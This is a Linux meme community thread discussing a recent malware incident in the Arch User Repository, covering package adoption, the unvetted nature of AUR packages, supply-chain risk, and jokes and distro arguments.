this post was submitted on 16 Jun 2026
599 points (97.8% liked)

linuxmemes

31979 readers
965 users here now

Hint: :q!


Sister communities:


Community rules (click to expand)

1. Follow the site-wide rules

2. Be civil
  • Understand the difference between a joke and an insult.
  • Do not harrass or attack users for any reason. This includes using blanket terms, like "every user of thing".
  • Don't get baited into back-and-forth insults. We are not animals.
  • Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.
  • Bigotry will not be tolerated.
  • 3. Post Linux-related content
  • Including Unix and BSD.
  • Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of sudo in Windows.
  • No porn, no politics, no trolling or ragebaiting.
  • Don't come looking for advice, this is not the right community.
  • 4. No recent reposts
  • Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.
  • 5. ๐Ÿ‡ฌ๐Ÿ‡ง Language/ัะทั‹ะบ/Sprache
  • This is primarily an English-speaking community. ๐Ÿ‡ฌ๐Ÿ‡ง๐Ÿ‡ฆ๐Ÿ‡บ๐Ÿ‡บ๐Ÿ‡ธ
  • Comments written in other languages are allowed.
  • The substance of a post should be comprehensible for people who only speak English.
  • Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed.
  • 6. (NEW!) Regarding public figuresWe all have our opinions, and certain public figures can be divisive. Keep in mind that this is a community for memes and light-hearted fun, not for airing grievances or leveling accusations.
  • Keep discussions polite and free of disparagement.
  • We are never in possession of all of the facts. Defamatory comments will not be tolerated.
  • Discussions that get too heated will be locked and offending comments removed.
  • ย 

    Please report posts and comments that break these rules!


    Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.

    founded 3 years ago
    MODERATORS
     
    top 50 comments
    sorted by: hot top controversial new old
    [โ€“] punkcoder@lemmy.world 161 points 2 weeks ago (1 children)

    Real talk for a moment, there isnโ€™t a system alive that currently solves the supply chain attack issue. thereโ€™s a trade-off between usability, and security. You can be a secure as you want to be, all it takes is a small accident by one developer in a package that youโ€™re using, even if theyโ€™re using gpg signing to accidentally upload A package thatโ€™s been tampered. It stinks, but thatโ€™s the reality. What I think should be applauded is the thoroughness that the arch developers are going through the repo right now trying to find these packages. I donโ€™t know the specifics, but if theyโ€™re like other open source developers, theyโ€™re unpaid people doing this out of their love for the software and community. and more than likely, this is a headache on top of headaches that they already have that theyโ€™re doing for the love of the community.

    [โ€“] RustyNova@lemmy.world 8 points 2 weeks ago (2 children)

    Idk how the AUR works but I like that nix fetch the source from the repo and also check its hash from a maintainer provided one. Prevents repo hijacking.

    Although it's still pretty much vulnerable if the attacker controls both the nix file and the repo

    [โ€“] bitfucker@programming.dev 16 points 2 weeks ago

    Every *-git package also fetch it from the repo. The apt analogy is someone haven't been maintaining the nixpkg and then it gets adopted by someone else. Now that someone else change the build script to be malware. So it is no fault of the upstream

    [โ€“] sudo@programming.dev 5 points 2 weeks ago

    That wouldn't have fixed the AUR incident because the attacker updated the PKGBUILD which is roughly the same as the nixfile. And there are no packages provided by the AUR, just PKGBUILDs. You always build the package yourself locally.

    [โ€“] adhdsergio@lemmy.world 53 points 2 weeks ago (1 children)

    Meanwhile, Windows users: btw, first time? ๐Ÿ’€๐Ÿชข

    [โ€“] jasoman@lemmy.world 6 points 2 weeks ago (1 children)

    Wait AUR works in windows?

    [โ€“] adhdsergio@lemmy.world 71 points 2 weeks ago (3 children)
    [โ€“] jasoman@lemmy.world 23 points 2 weeks ago (5 children)

    It is ok, Micro$oft is asking me to call so they can fix it for me.

    load more comments (5 replies)
    [โ€“] wizardbeard@lemmy.dbzer0.com 12 points 2 weeks ago (3 children)

    I legitimately have not had virus issues with Windows in over a decade. Using uBlock Origin for ad blocking and the built in Microsoft antivirus. Every few months for the first few years I'd put it through the wringer of a bunch of USB-bootable antivirus scanners. They kept finding nothing, so I slowed and eventually stopped bothering.

    Common sense and an ad blocker do wonders.

    [โ€“] adhdsergio@lemmy.world 6 points 2 weeks ago

    To be fair, me neither, but every time somebody has an infected machine, it is windows

    [โ€“] Quetzalcutlass@lemmy.world 4 points 2 weeks ago

    I'll second that ad blocking and common sense are probably enough. On every one of my machines, Windows Defender hasn't reported finding anything that wasn't a false positive in all the years it's existed, even before it was bundled with Windows. And I'm someone who constantly installs random indie games and niche software.

    Ad blockers and secure connections preventing MitM attacks did more to eliminate viruses than most anti-malware ever could. Viruses used to be everywhere in the old days, but now you usually only hear about them spreading through supply chain attacks or targeted campaigns.

    [โ€“] OwOarchist@pawb.social 4 points 2 weeks ago

    Trying to run pirated games will burn you occasionally, though.

    But that's okay. My gaming PC is only for gaming. If it manages to get a virus that I can't quickly resolve, I'll just wipe it and restore from backup. And the biggest tragedy there will be that I won't be able to play games for a few hours. Meanwhile, my Linux PC that does everything important is completely safe.

    [โ€“] cyberpunk007@lemmy.ca 4 points 2 weeks ago

    Extensively.

    [โ€“] agentTeiko@piefed.social 21 points 2 weeks ago (5 children)

    I'm not going to lie the aur never made sense to me. If you are going to go to all that trouble why not just package it. Source packages are a thing.

    [โ€“] rtxn@lemmy.world 33 points 2 weeks ago* (last edited 2 weeks ago)

    The developers themselves are often not the package maintainers. Before a package is published or updated in one of the official Arch repos, it has to be built, tested, and sometimes patched (which is why you see a -1, -2, etc. appended to the package version), in order to work correctly not just on its own but in an Arch system with Arch packages that it is likely to encounter. The process is not as thorough as Debian for example, but it's still the responsibility of the package maintainer. If the package is still in early development, deprecated (e.g. wine32), an out-of-tree kernel module (e.g. xpadneo-dkms), or is meant to be built from the latest available commit (any number of *-git packages), the AUR is a convenient way to share PKGBUILD files rather than have the user build the software manually based on a readme, if it even includes build instructions. The PKGBUILD is then ingested by makepkg, which both configures the environment and builds the software, and outputs a package that can then be installed and managed by Pacman.

    The caveat is that packages built from the AUR are not vetted by any package maintainers. They can have bugs, they might depend on outdated or no-longer-existent packages, or might contain malware.

    [โ€“] stepan@lemmy.cafe 22 points 2 weeks ago (7 children)

    it makes sense to me. remove as much friction from the publishing process as possible, so you get a huge amount of packages. this incident just shows they removed a little too much.

    there are so many niche packages on the aur useful to so few people that nobody would go through the official process to properly package, test, and maintain them.

    for example: vscodium is a fork of vscode, but microsoft disables the marketplace for it. the vscodium-marketplace package from the aur adds it anyway. i don't think any regular repos have these kind of hacks and patches available.

    load more comments (7 replies)
    [โ€“] Shatur@discuss.tchncs.de 15 points 2 weeks ago* (last edited 2 weeks ago)

    Source packages are a thing.

    AUR is a repository for source packages (in Arch it's called PKGBUILD) from users. You can write PKGBUILD yourself or just download it from AUR if someone already made it.

    load more comments (2 replies)
    [โ€“] muusemuuse@sh.itjust.works 18 points 2 weeks ago

    Back when I was learning arch they made sure you understood AUR is an option, it was never a good option. Even then the risks were just not worth it.

    My understanding the AUR was it was supposed to be a โ€œhereโ€™s how I made this work.โ€ But it gets treated as a generic repo all the time soโ€ฆthis.

    [โ€“] carmo55@lemmy.zip 17 points 2 weeks ago (2 children)

    Why is adoption a thing in this way though? People compare AUR to github which seems very apt, but on Github no-one can come and take over the URL of an abandoned repo for rhemselves, if someone wants to start maintaining and the old owner is MIA, they have to make a fork. Why doesn't AUR work the same way but instead allows anyone to take over any abandoned project with no checks?

    [โ€“] communism@lemmy.ml 8 points 2 weeks ago (2 children)

    The forking option wouldn't work as well as it does on github because AUR packages are not namespaced like GitHub repos, e.g. communism/mypackage; instead it's just mypackage. So if adoption required a new name you'd have mypackage-cont, mypackage-cont-cont, or whatever. And it wouldn't really be possible to introduce username namespacing because AUR packages are just Pacman packages that are community-contributed rather than official, and Pacman, like most package managers, doesn't namespace their package names; firefox is just firefox rather than, say, mozilla/firefox. Some AUR packages get added to the official repos so when you do, e.g. yay -Syu, you'll then install the official package if you previously had the AUR package installed as it has the same name.

    There isn't a perfect solution. Even if package adoptions were moderated, someone could take over a package and initially push a genuine commit, and then their next commit is malicious. Reviewing every single AUR commit would be incredibly labour-intensive. Possibly you could add automated checks for commits that suddenly add an npm install or other suspicious command with regex, but attackers could just get cleverer about avoiding those regex checks. Imo the best solution is just more widespread warnings about the fact that AUR packages are community-contributed with no guarantees of safety (e.g. on the Arch wiki where it sometimes suggests users install AUR packages), and AUR helpers forcing users to read PKGBUILDs before installation.

    load more comments (2 replies)
    load more comments (1 replies)
    [โ€“] basxto@discuss.tchncs.de 15 points 2 weeks ago

    Did somebody get infected by installing https://aur.archlinux.org/packages/sex ?

    [โ€“] Gork@sopuli.xyz 13 points 2 weeks ago (3 children)

    It bothers me that the movie this meme is based on removed the head rests. Smh my head.

    [โ€“] chaotic_disorganizer@lemmy.world 11 points 2 weeks ago (2 children)

    Every movie does that. Just how they remove helmets from bikers and armor. Gotta see the actors beautiful face after all.

    [โ€“] tkk13909@sopuli.xyz 9 points 2 weeks ago (1 children)

    What's even worse is the helmets with lights on the inside so bright all the character would see is their own reflection

    [โ€“] Zelaf@sopuli.xyz 7 points 2 weeks ago

    And loose their darkness vision and looking at some of those SciFi space helmets, basically completely blinded.

    [โ€“] 14th_cylon@lemmy.zip 5 points 2 weeks ago

    Star trek would not make it through first season if they wore ev suit every time they beam down...

    [โ€“] eager_eagle@lemmy.world 8 points 2 weeks ago

    shake my head rest

    load more comments (1 replies)
    [โ€“] CubitOom@infosec.pub 13 points 2 weeks ago (1 children)

    I use aur, extensively, wasn't impacted by the supply chain attack cause I read the diffs.

    [โ€“] ReginaPhalange@lemmy.world 13 points 2 weeks ago (2 children)

    Be real for a second,
    Did you, or did you not, manage to review a diff, and say "no, that looks fishy".

    Do you really think you are immune from compromised binary AUR packages thats being downloaded straight from GitHub? Sure, now it's not only the AUR that's bad, but in the end of the day, a malicious binary did arrive at your computer.

    Let's say that you don't use *-bin packages, and only download from compilable source, are you immune from the strategy that the state actor who caused CVE-2024-3094 used to compromise packages?

    [โ€“] CubitOom@infosec.pub 5 points 2 weeks ago

    in the end of the day, a malicious binary did arrive at your computer.

    No, it didn't.

    load more comments (1 replies)
    [โ€“] locahosr443@lemmy.world 10 points 2 weeks ago

    I have like 4 things installed from aur, investigated each one first, and I'm still paranoid about all of them.

    [โ€“] mrbutterscotch@feddit.org 8 points 2 weeks ago (5 children)

    Relatively new Linux user here.

    I've seen a few posts about malware on Linux mentioning things called AUR and NPM.

    I understand they are package managers? Is that something I have to worry about as a Bazzite user?

    [โ€“] M0oP0o@mander.xyz 15 points 2 weeks ago (1 children)

    Not likely. Just know that AUR is user driven and not checked or vetted.

    [โ€“] mrbutterscotch@feddit.org 4 points 2 weeks ago (1 children)

    Yeah, I try to stick to the native flatpak manager for bazzite. Are there any other vetted software managers out there that you would recommend?

    load more comments (1 replies)
    [โ€“] sudo@programming.dev 10 points 2 weeks ago (1 children)

    npm: Node Package Manager.
    AUR: Arch User Repository.

    Bazzite is based on fedora not Arch so you don't need to worry.

    load more comments (1 replies)
    load more comments (3 replies)
    [โ€“] irate944@piefed.social 6 points 2 weeks ago

    I use malware btw

    [โ€“] parlaptie@feddit.org 5 points 2 weeks ago (2 children)

    Is this referring to some specific event or is it just a general warning about AUR?

    I use AUR for "legacy" NVidia drivers btw

    [โ€“] Eccowave@feddit.org 8 points 2 weeks ago

    It's referring to those unfortunate findings

    load more comments (1 replies)
    [โ€“] mecen@lemmy.ca 5 points 2 weeks ago (1 children)

    To be fair aur should be merged with nix or something to share efforts and be cross platform.

    There is also appimages, if used as flatimage which uses bubblewrap as sandbox even if there is malware its impact would be minimalized

    load more comments (1 replies)
    [โ€“] jasoman@lemmy.world 5 points 2 weeks ago

    Like saying as a widows user. "I got called by Microsoft "

    [โ€“] DupaCycki@lemmy.world 4 points 2 weeks ago (7 children)

    A lot of people probably won't like this, but personally I feel like Arch is a terrible OS from an average user's perspective. It offers nothing notable of value to its users, while making sacrifices in critical areas.

    Unstable as hell and constantly breaks for no reason. On top of that, it's seriously insecure, as shown on exhibit A. It's not the first time, and it won't be the last.

    Why not use Mint, Fedora, Zorin, Pop!_OS, or any of countless Linux distros that work perfectly and don't suffer from Arch's issues?

    Note: I'm not an OS developer and mean no hate towards Arch devs or users. I'm simply speaking from a user experience perspective.

    [โ€“] f4f4f4f4f4f4f4f4@sopuli.xyz 14 points 2 weeks ago* (last edited 2 weeks ago) (2 children)

    You said Ubuntu three times. /s

    AUR is supposed the last resort, after distro repos, building from source, Flatpak, and Appimage. Ubuntu's equivalent to the AUR would be PPAs.

    Personally, I have fewer problems gaming on Arch than any other I've tried.

    Edit: Snap is bad for software freedom. I won't touch Ubuntu anymore; if I use apt, I meant apt and not snap. Hijacking my command is Microsoft-style rug-pulling.

    [โ€“] cryptix@discuss.tchncs.de 7 points 2 weeks ago (1 children)
    [โ€“] f4f4f4f4f4f4f4f4@sopuli.xyz 10 points 2 weeks ago

    I had heard that Ubuntu is an old African word for "can't configure Debian"

    load more comments (1 replies)
    [โ€“] Sceptique@leminal.space 14 points 2 weeks ago (4 children)

    My experience is arch is more stable than ubuntu. Broke once in the last 10 years, because of a bug in a package, fixed the system with manual upgrade from live usb in 1h. AUR is not part of the archlinux repositories, it's a community thing with mostly the same security problems every similar package manager has (npm, gems, etc.)

    1-1, we did not learn anything except you don't like arch.

    load more comments (4 replies)
    [โ€“] infinitesunrise@slrpnk.net 14 points 2 weeks ago* (last edited 2 weeks ago) (2 children)

    "Unstable as hell", "breaks for no reasons", "seriously insecure", other distros "work perfectly". I find this kind of uninformed hyperbole tiring, but probably entirely descriptive of your own user journey. Arch is intended for technical users, not "average users" (Whatever that means), and people should not be recommending that their uninitiated friends start their Linux journey there unless they're prepared and capable of providing technical support. I used Fedora and Ubuntu for decades before moving to Arch a few years ago, and I've never loved an OS more than I love this one. But that's my journey.

    load more comments (2 replies)
    [โ€“] sudo@programming.dev 8 points 2 weeks ago (4 children)

    Arch is deliberately minimal making it a good base system in the same way Debian or Fedora is. It's smaller, simpler, updates faster than the others and is far more configurable. It is however not built for the average user and most distros built on top of it that try to make it more "usable" are IMO pretty dangerous ideas. I think the only derivative i've tried that was good was SteamOS because they made it Atomic like nix or silverblue.

    None of this really has to do with the AUR. That was always labelled as "use at your own risk". And to their credit they caught and addressed the attack within a day of it happening. Still, hosting user PKGBUILDs and leaving it to individual users to audit them is not a secure solution, its just punting on the responsibility.

    load more comments (4 replies)
    load more comments (3 replies)
    [โ€“] trackball_fetish@lemmy.wtf 4 points 2 weeks ago

    I'd just like to interject for a moment. What you're refering to as Berkeley Software Distribution, is in fact, Unix or as I've recently taken to calling it, Ma Bell Berkeley Unix

    load more comments
    view more: next โ€บ